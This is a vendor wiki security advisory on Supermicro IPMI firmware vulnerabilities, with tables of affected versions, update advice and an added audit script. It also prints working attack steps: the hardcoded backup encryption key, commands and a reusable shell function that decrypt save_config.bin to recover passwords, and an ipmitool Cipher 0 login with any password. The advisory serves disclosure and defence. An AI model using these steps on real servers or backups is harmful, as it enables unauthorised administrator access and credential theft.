Supermicro IPMI Security Updates July 2014

From Thomas-Krenn-Wiki

Older IPMI firmware revisions of Supermicro motherboards are currently affected by multiple security vulnerabilities.

Thomas-Krenn advises protecting IPMI interfaces with a firewall or VPN and not leaving them publicly accessible on the Internet. Moreover, it is important to update the IPMI firmware to the versions described below.

Common Security Practice

We recommend protecting administrative access such as IPMI or SSH with firewalls/VPNs and not exposing it to publicly available networks like the Internet. Access should be granted to authorized people only. This advice is common practice and independent of the vulnerabilities described later on.[1]

In addition to a dedicated firewall, the Supermicro X7/X8/H8/X9/X10 motherboards with ATEN-based IPMI provide an integrated firewall to restrict remote management access (cf. Integrated IPMI Firewall of Supermicro Motherboards).

Affected motherboards and recommended firmware revisions

The following table gives an overview of the security vulnerabilities, the affected motherboards and the recommended firmware revisions. For each motherboard group it lists the recommended firmware and, per vulnerability, the firmware revisions that are affected.

IPMI firmware for affected motherboards from Thomas-Krenn's portfolio. Vulnerabilities covered:

  • Plaintext login credentials in save_config.bin
  • NTP amplification
  • Unsafe string functions[2]
  • Plaintext login credentials exposed over UDP port 49152[3]
  • IPMI authentication bypass via Cipher 0[4]

X10-Mainboards (ASPEED-ATEN)
  Recommended firmware: 1.42 or above (SMT_X10_142.bin)
  Plaintext login credentials in save_config.bin: before 1.42[t 1]
  NTP amplification: before 1.30[5]
  Unsafe string functions: before 1.24
  Plaintext login credentials over UDP port 49152: not affected[t 2]
  Authentication bypass via Cipher 0: not affected[t 2]

X9-Mainboards (Nuvoton-ATEN)
  Recommended firmware: 3.28 or above (SMT_X9_328.bin)
  Plaintext login credentials in save_config.bin: before 3.28
  NTP amplification: before 3.20[6][7]
  Unsafe string functions: before 3.17/3.15
  Plaintext login credentials over UDP port 49152: before 3.15[t 3]
  Authentication bypass via Cipher 0: before 1.58

X7/X8/H8-Mainboards (Nuvoton-ATEN)
  Recommended firmware: 3.15 or above (SMT_315.bin)
  Plaintext login credentials in save_config.bin: before 3.15[t 4]
  NTP amplification: before 3.13[8]
  Unsafe string functions: before 3.12
  Plaintext login credentials over UDP port 49152: before 3.10[t 5]
  Authentication bypass via Cipher 0: before 2.50

X9-Mainboards (Renesas)
  Recommended firmware: 2.16 or above (SMM_X9_2.16.0.ima)
  Plaintext login credentials in save_config.bin: not affected
  NTP amplification: not affected
  Unsafe string functions: not affected
  Plaintext login credentials over UDP port 49152: not affected
  Authentication bypass via Cipher 0: before 2.16

X8-Mainboards (Nuvoton-AMI)
  Recommended firmware: 2.20 or above (X8..._220.ima - image depends on the motherboard)
  Plaintext login credentials in save_config.bin: not affected[t 6]
  NTP amplification: not affected[t 7]
  Unsafe string functions: not affected
  Plaintext login credentials over UDP port 49152: not affected[t 7]
  Authentication bypass via Cipher 0: before 2.20

X7/H8-Mainboards (AOC-SIM1U+/AOC-SIMSO+)
  • Single CPU: X7SBI, X7SBE, H8SMI-2
  • Dual CPU: X7DBE, X7DBR-3, X7DVL-E, H8DME-2
  Recommended firmware: 1.66 or above
  Plaintext login credentials in save_config.bin: not affected
  NTP amplification: not affected
  Unsafe string functions: not affected
  Plaintext login credentials over UDP port 49152: not affected
  Authentication bypass via Cipher 0: before 1.66

Test notes:

  1. In our tests firmware version 1.26 was affected, version 1.42 was not.
  2. Tested with firmware versions 1.26 and 1.42.
  3. In our tests we could not exploit the vulnerability with firmware version 3.15.
  4. In our tests firmware versions 2.66 (tested with X7SPE-HF), 3.10 and 3.14 (both tested with H8SCM-F) were affected, but version 3.15 was not.
  5. In our tests firmware version 2.66 was affected (tested with X7SPE-HF), but version 3.10 was not (tested with H8SCM-F).
  6. The firmware has no save-config functionality.
  7. Tested with firmware version 2.08 (X8DT3_208.ima).

Update IPMI Firmware

The corresponding firmware images for your server are located in the Downloads section.

Please find the instructions on how to update the firmware at:

Attention: If you keep your current IPMI configuration during the update (by checking the box "Preserve Configuration"), you have to re-save the NTP configuration in the web interface afterwards to close the NTP vulnerability.

Unchecking "Preserve Configuration" resets the IPMI module to its factory defaults; IP addresses and all other settings must then be configured again. This can be done with ipmicfg, the BIOS or other tools, cf. IPMI Configuration for Supermicro Systems. (Exception: the X10SLH-F keeps its settings when updating to firmware 1.42.)

Further Information about the Vulnerabilities

The following sections provide detailed information on the security problems.

Plaintext Login Credentials in save_config.bin

Plaintext login credentials can be extracted from IPMI configuration backups (save_config.bin). The configuration backups are encrypted, but the publicly available firmware files reveal the secret encryption key, which is hardcoded in the backup tool.[9]

The following commands show how to extract login credentials:

~/tmp/ipmi$ binwalk SMT_X9_315.bin
~/tmp/ipmi$ dd if=SMT_X9_315.bin bs=1 skip=1572864 count=8372224 of=cramfs1
~/tmp/ipmi$ dd if=SMT_X9_315.bin bs=1 skip=12058624 count=1945600 of=cramfs2
~/tmp/ipmi$ sudo mount -o loop -t cramfs cramfs1 mnt1
~/tmp/ipmi$ strings mnt1/bin/ipmi_conf_backup_tool | grep -A 1 -B 1 -m 1 openssl
CKSAM1SUCKSAM1SUASMUCIKSASMUCIKS
~/tmp/ipmi$ openssl aes-256-cbc -d -in save_config.bin -out backup.bin.dec -k CKSAM1SUCKSAM1SUASMUCIKSASMUCIKS -md md5
~/tmp/ipmi$ dd skip=6 bs=1 status=none if=backup.bin.dec of=backup.tar.gz
~/tmp/ipmi$ tar xzf backup.tar.gz
~/tmp/ipmi$ ack-grep -i passwd preserve_config
    preserve_config/ps.xml
    5:      <User num="0" enable="01" PasswdSize="00" Name="" Passwd="admin"
    ChannelAccess="00000000000000000000000000000000" PrivilegeChange="00">
    9:      <User num="1" enable="01" PasswdSize="00" Name="ADMIN" Passwd="**********"
    ChannelAccess="00540054000000000000000000000000" PrivilegeChange="00">
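The extraction steps above as a reusable shell function, added here as an example and not taken from the original article or from Supermicro's tools. To make it runnable without a real BMC, a second function builds a synthetic save_config.bin with the same key and the same OpenSSL parameters (aes-256-cbc, -k passphrase, -md md5). The key is the one read out of ipmi_conf_backup_tool above; the 6-byte header "SMCHDR" and the ps.xml layout are assumptions modelled on the dd skip=6 step and the grep output shown on the page.

```shell
#!/bin/sh
# Added example: reproduce the save_config.bin decryption pipeline offline.
# KEY is the key recovered from ipmi_conf_backup_tool above. The 6-byte header
# and the XML layout are assumptions modelled on the page's dd and grep output.
KEY=CKSAM1SUCKSAM1SUASMUCIKSASMUCIKS

# make_sample_backup OUTFILE USER PASSWORD
# Builds header + gzip'd tar of preserve_config/ps.xml and encrypts it with the
# same OpenSSL parameters the firmware uses (aes-256-cbc, -k passphrase, -md md5).
make_sample_backup() {
  out=$1; user=$2; pw=$3
  tmp=$(mktemp -d)
  mkdir -p "$tmp/preserve_config"
  cat > "$tmp/preserve_config/ps.xml" <<EOF
<?xml version="1.0"?>
<Config>
  <User num="0" enable="01" PasswdSize="00" Name="" Passwd="admin" ChannelAccess="00000000000000000000000000000000" PrivilegeChange="00"/>
  <User num="1" enable="01" PasswdSize="00" Name="$user" Passwd="$pw" ChannelAccess="00540054000000000000000000000000" PrivilegeChange="00"/>
</Config>
EOF
  ( cd "$tmp" && tar czf backup.tar.gz preserve_config )
  { printf 'SMCHDR'; cat "$tmp/backup.tar.gz"; } > "$tmp/plain.bin"   # assumed 6-byte header
  openssl aes-256-cbc -e -in "$tmp/plain.bin" -out "$out" -k "$KEY" -md md5 2>/dev/null
  rm -rf "$tmp"
}

# extract_creds BACKUPFILE
# Decrypts with the key from the firmware, strips the 6-byte header, unpacks
# the tar and prints one "Name:Passwd" line per <User> entry in ps.xml.
extract_creds() {
  in=$1
  tmp=$(mktemp -d)
  if ! openssl aes-256-cbc -d -in "$in" -out "$tmp/dec.bin" -k "$KEY" -md md5 2>/dev/null; then
    rm -rf "$tmp"; return 1
  fi
  tail -c +7 "$tmp/dec.bin" > "$tmp/backup.tar.gz"   # equivalent to dd skip=6 bs=1
  tar xzf "$tmp/backup.tar.gz" -C "$tmp"
  grep -o '<User [^>]*>' "$tmp/preserve_config/ps.xml" |
    sed -n 's/.*Name="\([^"]*\)".*Passwd="\([^"]*\)".*/\1:\2/p'
  rm -rf "$tmp"
}

# Usage on a real backup downloaded from the web interface:
#   extract_creds save_config.bin
```

Because the same key is baked into every firmware image, anyone who obtains the backup file obtains the credentials; treat save_config.bin with the same care as a plaintext password file.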

Consequences

An attacker with access to a configuration backup can extract the login credentials and use username and password directly. The encryption of the backup file therefore provides no effective protection, because the key is hardcoded in the firmware image.

Countermeasures

Possible countermeasures:

  1. Update the firmware to a revision described above.
  2. Keep configuration backups in a secure place. Backups can only be created by IPMI administrator users. If access to the backup files is restricted, the login credentials cannot be extracted from them.

NTP Amplification

NTP servers with the monlist feature enabled can be made to send very large responses to a single request.[10] The monlist feature returns a list of up to 600 IP addresses the NTP server has recently had contact with. By spoofing the source IP address, that response data can be directed at a victim.[11][12] Such NTP amplification attacks can therefore be the basis for a Denial of Service (DoS) attack.

The following ntpdc command, run from a remote Linux administration machine, checks whether a specific server (in this example 192.0.2.1) supports the monlist feature:

$ ntpdc -n -c monlist 192.0.2.1
remote address          port local address      count m ver rstr avgint  lstint
===============================================================================
192.0.2.2              40506 192.0.2.5          1 7 2      0      0      0

If monlist is deactivated, the output is:

$ ntpdc -n -c monlist 192.0.2.1
***Server reports data not found

If NTP is deactivated, the output is:

$ ntpdc -n -c monlist 192.0.2.1
ntpdc: read: Connection refused

Consequences

An attacker can send spoofed requests to an NTP server with monlist enabled and thereby carry out a DoS attack on a third host.

Countermeasures

Possible Countermeasures:

  1. Update the firmware to a revision described above. If the IPMI configuration was kept during the upgrade, re-save the NTP configuration (Configuration -> Date & Time in the web interface); this disables monlist.
  2. Disable NTP (select Configuration -> Date & Time, check NTP Disable, then press Save).

Unsafe String Functions

Multiple CGI scripts use unsafe string functions and can be exploited by buffer overflow attacks.

Consequences

If a buffer overflow attack succeeds, arbitrary commands can be executed with root privileges.[13][14]

Countermeasures

Possible Countermeasures:

  1. Update the firmware to a revision described above.

Plaintext Login Credentials exposed over UDP Port 49152

Older IPMI firmware versions reveal cleartext login credentials over UDP port 49152.[15][16]

Consequences

An attacker with access to UDP port 49152 of the IPMI IP address can send a GET /PSBlock request and receives username and password in the response.

Countermeasures

Possible Countermeasures:

  1. Update the firmware to a revision described above.

IPMI Authentication Bypass via Cipher 0

A severe flaw in the IPMI 2.0 specification (cipher suite 0) allows authentication with any password.[17]

The following command checks whether Cipher 0 is offered by an IPMI interface:

$ ipmitool -H 192.0.2.1 -U ADMIN -P ***** lan print|grep 'Cipher Suites'
RMCP+ Cipher Suites     : 1,2,3,6,7,8,11,12,0

A 0 in the RMCP+ Cipher Suites line indicates that Cipher 0 can be used. Authentication can then be bypassed; any password grants access:

$ ipmitool -I lanplus -C 0 -H 192.0.2.1 -U ADMIN -P FluffyWabbit user list
ID  Name	     Callin  Link Auth	IPMI Msg   Channel Priv Limit
2   ADMIN            false   false      true       ADMINISTRATOR
3   monitor          true    true       true       USER
[...]

Consequences

If an attacker is able to use Cipher 0, authentication as IPMI administrator with any password is possible.
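A small audit helper, added here as an example and not part of the original article, that checks a list of BMCs for three of the findings above at once: firmware below the recommended revision from the table, NTP monlist enabled (the three ntpdc outcomes shown in the NTP section), and Cipher 0 listed in the RMCP+ cipher suites. The probe function calls ntpdc and ipmitool exactly as on the page; the parsing and version comparison are pure shell, so they can be run on captured output without a BMC. The family names (X10_ATEN, X9_ATEN, ...) are our own labels for the table rows, and it is assumed that `ipmitool mc info` reports the version as "Firmware Revision : X.YY".

```shell
#!/bin/sh
# Added audit helper, not from the original article. Checks BMCs for:
#   - firmware below the recommended revision (table above)
#   - NTP monlist enabled (ntpdc outcomes from the NTP section)
#   - Cipher 0 offered in the RMCP+ cipher suite list
# Family labels are assumptions mapping to the table rows above.

# recommended_firmware FAMILY -> minimum recommended firmware from the table
recommended_firmware() {
  case "$1" in
    X10_ATEN)    echo 1.42 ;;
    X9_ATEN)     echo 3.28 ;;
    X7X8H8_ATEN) echo 3.15 ;;
    X9_RENESAS)  echo 2.16 ;;
    X8_AMI)      echo 2.20 ;;
    X7H8_AOC)    echo 1.66 ;;
    *)           return 1 ;;
  esac
}

# version_ge A B -> true if A >= B, comparing major and minor numerically
# (string comparison would get 1.26 vs 1.42 right but 3.9 vs 3.28 wrong).
version_ge() {
  amaj=${1%%.*}; amin=${1#*.}; [ "$amin" = "$1" ] && amin=0; amin=${amin%%.*}
  bmaj=${2%%.*}; bmin=${2#*.}; [ "$bmin" = "$2" ] && bmin=0; bmin=${bmin%%.*}
  [ "$amaj" -gt "$bmaj" ] || { [ "$amaj" -eq "$bmaj" ] && [ "$amin" -ge "$bmin" ]; }
}

# firmware_status FAMILY VERSION -> OK | UPDATE | UNKNOWN_FAMILY
firmware_status() {
  want=$(recommended_firmware "$1") || { echo UNKNOWN_FAMILY; return; }
  if version_ge "$2" "$want"; then echo OK; else echo UPDATE; fi
}

# parse_monlist: classifies `ntpdc -n -c monlist HOST` output read from stdin
# using the three outcomes shown in the NTP section above.
parse_monlist() {
  out=$(cat)
  case "$out" in
    *"data not found"*)     echo MONLIST_DISABLED ;;
    *"Connection refused"*) echo NTP_DISABLED ;;
    *"remote address"*)     echo MONLIST_ENABLED ;;
    *)                      echo UNKNOWN ;;
  esac
}

# cipher0_offered: reads `ipmitool ... lan print` output from stdin and
# succeeds if suite 0 is listed. Splits on commas so that 10 or 12 cannot
# match by accident.
cipher0_offered() {
  grep 'Cipher Suites' | head -n 1 | sed 's/.*: *//' | tr ',' '\n' | tr -d ' ' | grep -qx '0'
}

# probe_bmc HOST USER PASSWORD FAMILY -> one summary line per BMC (needs network)
probe_bmc() {
  host=$1; user=$2; pass=$3; family=$4
  ver=$(ipmitool -H "$host" -U "$user" -P "$pass" mc info 2>/dev/null |
        sed -n 's/^Firmware Revision *: *//p')
  fw=$(firmware_status "$family" "${ver:-0.0}")
  ntp=$(ntpdc -n -c monlist "$host" 2>&1 | parse_monlist)
  if ipmitool -H "$host" -U "$user" -P "$pass" lan print 2>/dev/null | cipher0_offered; then
    c0=CIPHER0_OFFERED
  else
    c0=CIPHER0_NOT_LISTED
  fi
  echo "$host fw=${ver:-?} $fw $ntp $c0"
}

# Usage: probe_bmc 192.0.2.1 ADMIN 'secret' X9_ATEN
```

Run probe_bmc once per BMC from a management host that is allowed to reach the IPMI network; a line reporting UPDATE, MONLIST_ENABLED or CIPHER0_OFFERED identifies a board that still needs the firmware update from the table above. Note that CIPHER0_NOT_LISTED is also printed when the ipmitool query itself fails, so check that the fw field was filled in before trusting it.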

Countermeasures

Possible Countermeasures:

  1. Update the firmware to a revision described above.

References

  1. Best Practices for managing servers with IPMI features enabled in Datacenters (www.supermicro.com)
  2. Firmware Fixes to Common Vulnerabilities and Exposures (www.supermicro.com)
  3. Supermicro motherboards with clear text passwords are found. What are the recommended F/W patches? (Supermicro FAQ 18897, 24.06.2014)
  4. I read an article where Supermicro BMC (IPMI) security can be breached through UPnP and through Cipher 0 mechanisms. How do I avoid such issues? (Supermicro FAQ 16536, 08.07.2013)
  5. We have received complaints of our SM IPMI cards being used for NTP DOS attacks. (Supermicro FAQ 17997, 03.02.2014)
  6. I have one of the Supermicro X9 motherboards. IPMI BMCs that have NTP enabled are being abused for NTP amplification DDoS attacks. Is there a fix for this? (Supermicro FAQ 17843, 14.01.2014)
  7. According to recent NTP Amplification Attacks, I found that firmware of motherboards X9SCA-F is vulnerable. (Supermicro FAQ 17908, 14.01.2014)
  8. I was alerted to the fact that the IP assigned to the IPMI of the X7SPE-HF-D525 was vulnerable. (Supermicro FAQ 18000, 03.02.2014)
  9. Securing SuperMicro’s IPMI with OpenVPN (michael.stapelberg.de)
  10. Technical Details Behind a 400Gbps NTP Amplification DDoS Attack (blog.cloudflare.com)
  11. IP Spoofing (en.wikipedia.org)
  12. NTP Amplification Attacks Using CVE-2013-5211 (us-cert.gov)
  13. Supermicro IPMI Firmware Vulnerabilities (community.rapid7.com)
  14. Exploiting the Supermicro Onboard IPMI Controller (community.rapid7.com)
  15. CARISIRT: Yet Another BMC Vulnerability (And some added extras) (blog.cari.net, 19.06.2014)
  16. Supermicro Motherboards IPMI Interface Discloses Passwords to Remote Users (securitytracker.com Alert ID 1030453, 20.06.2014)
  17. The Infamous Cipher 0 (fish2.com)

Author: Georg Schönberger


Author: Werner Fischer

Werner Fischer, working in the Knowledge Transfer team at Thomas-Krenn, completed his studies of Computer and Media Security at FH Hagenberg in Austria. He is a regular speaker at many conferences like LinuxTag, OSMC, OSDC, LinuxCon, and author for various IT magazines. In his spare time he enjoys playing the piano and training for a good result at the annual Linz marathon relay.

